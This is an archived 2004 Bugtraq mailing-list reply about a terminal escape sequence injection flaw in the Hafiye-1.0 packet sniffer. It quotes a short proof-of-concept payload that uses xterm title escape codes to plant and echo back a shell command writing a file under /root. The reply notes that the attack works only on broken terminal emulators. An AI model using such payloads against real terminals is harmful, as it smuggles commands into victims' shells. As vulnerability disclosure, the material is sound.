[36244] in bugtraq
Re: Hafiye-1.0 Terminal Escape Sequence Injection Vulnerability
daemon@ATHENA.MIT.EDU (Jan Minar)
Tue Aug 24 14:19:41 2004
Date: Tue, 24 Aug 2004 04:33:57 +0200
From: Jan Minar <jjminar@fastmail.fm>
To: bugtraq@securityfocus.com
Message-ID: <20040824023357.GA10936@kontryhel.haltyr.dyndns.org>
Mail-Followup-To: bugtraq@securityfocus.com
Mime-Version: 1.0
Content-Type: multipart/signed; micalg=pgp-sha1;
protocol="application/pgp-signature"; boundary="n8g4imXOkfNTN/H1"
Content-Disposition: inline
In-Reply-To: <412A382F.6060204@gmx.net>
--n8g4imXOkfNTN/H1
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
Content-Transfer-Encoding: quoted-printable
On Mon, Aug 23, 2004 at 09:32:15PM +0300, Serkan Akpolat wrote:
> If Hafiye has been started with -n packet count option ,
> the vulnerability could allow remote code execution.
> For remote code execution the victim must press Enter after program exit.
> "\x1b""]2;Insecure?""\x07\x0a",
> "\x07\x07\x07\x07\x07\x07",
> "\x1b""]2;;echo Owned > /root/Owned.txt"
> "\x07\x1b""[21t""\x1b""]2;xterm""\x07"
> "Abnormal Termination""\x1b"
> "[8m;""\x0a"};
That is, with broken terminals/emulators, such as is rxvt in Debian
Woody (at the time of my writing this). These devices/programs should
have been fixed long time ago in the first place. (Not that (albeit
crippled) echo-back escape sequences were a good idea anyway.)
Jan.
--=20
"To me, clowns aren't funny. In fact, they're kind of scary. I've wonder=
ed
where this started and I think it goes back to the time I went to the circ=
us,
and a clown killed my dad."
--n8g4imXOkfNTN/H1
Content-Type: application/pgp-signature
Content-Disposition: inline
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.6 (GNU/Linux)
Comment: For info see http://www.gnupg.org
iD8DBQFBKqkV+uczK20Fa5cRAgvoAJ42wYMZ4ojScvRX4fN7i+XymD6IEACgqjl5
dEfKFMhtGCU3wFhfTFErYl0=
=0w1J
-----END PGP SIGNATURE-----
--n8g4imXOkfNTN/H1--
